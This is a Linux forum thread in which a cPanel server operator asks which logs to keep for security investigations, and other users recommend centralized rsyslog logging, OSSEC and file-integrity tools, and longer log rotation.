LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 09-03-2014, 03:10 AM   #1
pranks
LQ Newbie
 
Registered: Jun 2010
Posts: 7

Rep: Reputation: 0
Logs to be maintained keeping security in mind


Hello,

What kind of logs we need to maintain keeping security in mind or which can be useful for investigation agencies. As of now I download following:


1) Website Access Log
/usr/local/apache/logs/access_log
/usr/local/apache/domlogs

2) FTP Acees Log
/var/log/messages

3) MySQL Access Log
/var/lib/mysql called hostname.log and hostname-slow.log where hostname is the short hostname for the machine.

4) Cpanel Access Log
/usr/local/cpanel/logs/access_log

Thanks
 
Old 09-03-2014, 04:41 AM   #2
zhjim
Senior Member
 
Registered: Oct 2004
Distribution: Debian Squeeze x86_64
Posts: 1,748
Blog Entries: 11

Rep: Reputation: 233Reputation: 233Reputation: 233
Every log file should be keep when it comes to security. One log file might not have all information you need or you might miss out on side steps been done.

Nother thing security wise is not to download the log files but to have them send to a logging server right away. An intruder will most likely alter the log files so downloads would not show any evidence. If you have the log files on another server you can compare them and see if they differ. If you need to investigate.
 
Old 09-03-2014, 08:14 PM   #3
solarisguy
Member
 
Registered: Aug 2010
Location: Seattle
Distribution: CentOS, RHEL, Oracle Enterprise Linux, Solaris, BSD
Posts: 64

Rep: Reputation: 21
Centralized logging is the best route here, with extremely limited access to the logging server.

One great way to do this is with rsyslog. It can take UDP 514 (standard syslog) or TCP 514, which ensures delivery. UDP has no retry mechanism; it's fire and forget. TCP will retransmit if there is an error on the wire.

One file you should always keep an eye on is /var/log/secure as well.

OSSEC is also a great tool to install on your system. It will watch for any suspicious activity and alert administrators when it is detected. I work for a very large telecom and we have this type of alarming in place. We know when a security event occurs even before the security NOC knows and have taken action to prevent further intrusions in the past.
 
1 members found this post helpful.
Old 09-04-2014, 02:06 AM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,409
Blog Entries: 55

Rep: Reputation: 3582Reputation: 3582Reputation: 3582Reputation: 3582Reputation: 3582Reputation: 3582Reputation: 3582Reputation: 3582Reputation: 3582Reputation: 3582Reputation: 3582
Talking about logs indeed is one thing. Too often I still see people don't alter logrotate defaults, meaning that given an incident a couple of months ago anything of use will already be rotated away and gone. Secondly it still needs emphasizing security is not a one off but (after the initial hardening process) a continuous process of auditing and adjusting. This means for example that installation of a service must be preceded by informing yourself about the (in)security of the software and the ways in which to mitigate risks, and be followed by proper configuration, testing and regular log checks (Logwatch?). Also note that one shouldn't rely on one auditing tool alone. For example the rootkit component of OSSEC HIDS hasn't as a whole been updated much since the product was bought by a large commercial vendor (and if you only want the file integrity checking part you could well use Samhain or even AIDE or tripwire). Finally, as the OP seems to be using Cpanel, he should be especially aware of the pitfalls of using such products.
 
1 members found this post helpful.
Old 09-06-2014, 02:01 AM   #5
pranks
LQ Newbie
 
Registered: Jun 2010
Posts: 7

Original Poster
Rep: Reputation: 0
Thanks everyone
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
[SOLVED] Can the advertisements be allowed keeping in mind the office environments? pls_help_URGENT LQ Suggestions & Feedback 5 01-19-2013 10:36 PM
Shell Script for keeping track when guest user logs on system... computergeek7 Programming 1 04-01-2010 03:10 PM
LXer: On keeping an open mind LXer Syndicated Linux News 1 03-03-2007 10:20 PM
Keeping track of logs mijohnst Linux - Software 1 03-29-2006 09:02 PM
keeping logs from a cron job dominant Linux - Newbie 2 03-02-2004 12:37 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 11:47 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration